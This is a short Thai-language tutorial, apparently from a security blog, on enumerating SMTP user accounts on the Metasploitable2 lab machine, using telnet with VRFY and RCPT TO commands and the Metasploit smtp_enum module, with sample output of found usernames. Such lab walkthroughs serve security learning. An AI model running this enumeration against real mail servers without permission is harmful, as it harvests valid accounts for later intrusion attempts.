How to enumerate SMTP user – Metasploitable2

บทนำ (Overview)

บทความนี้นำเสนอวิธีการค้นหาบัญชีผู้ใช้ (Username) จากโพรโตคอล SMTP โดยใช้คำสั่ง “VRFY” ซึ่งถ้ามีชื่อบัญชีผู้ใช้จะตอบกลับมา แต่ถ้าไม่มีก็จะตอบกลับมาเป็น “Recipient address rejected: User unknown in local recipient table” ที่นี้เราสามารถเขียนเป็น Script อัตโนมัติโดยใช้คำต่าง ๆ ที่คาดว่าจะเป็น Username หรือจะใช้งาน Metasploit ก็สะดวกดี

ขั้นตอน (Steps)

Telnet

  1. เชื่อมต่อ  “SMTP” โดยใช้ “Telnet” ดังนี้
    telnet 192.168.1.53 25
    
  2. จากนั้นเราสามารถใช้คำสั่ง “VRFY”  เพื่อตรวจสอบว่ามี “Username” จริงอยู่หรือเปล่าในระบบ จะเห็นได้ว่าถ้ามีจะตอบว่า “252 2.0.0 root” ถ้าไม่มีจะตอบกลับมา “Recipient address rejected: User unknown in local recipient table”
    VRFY root
    
  3. หรือทำนองเดียวกันใช้คำสั่ง “RCPT”
    MAIL FROM:google
    RCPT TO:root
    

    Metasploitable2-smtp-enum-01

Metasploit

  1. สามารถใช้คำสั่งดังต่อไปนี้
    msfconsole
    use auxiliary/scanner/smtp/smtp_enum
    set RHOSTS 192.168.1.53
    run
    
  2. รอสักครู่จะพบ username ดังนี้
    [+] 192.168.1.53:25       - 192.168.1.53:25 Users found: , backup, bin, daemon, distccd, ftp, games, gnats, irc, libuuid, list, lp, mail, man, news, nobody, postgres, postmaster, proxy, service, sshd, sync, sys, syslog, user, uucp, 
    

    Metasploitable2-smtp-enum-02

 

 

 

 

ใส่ความเห็น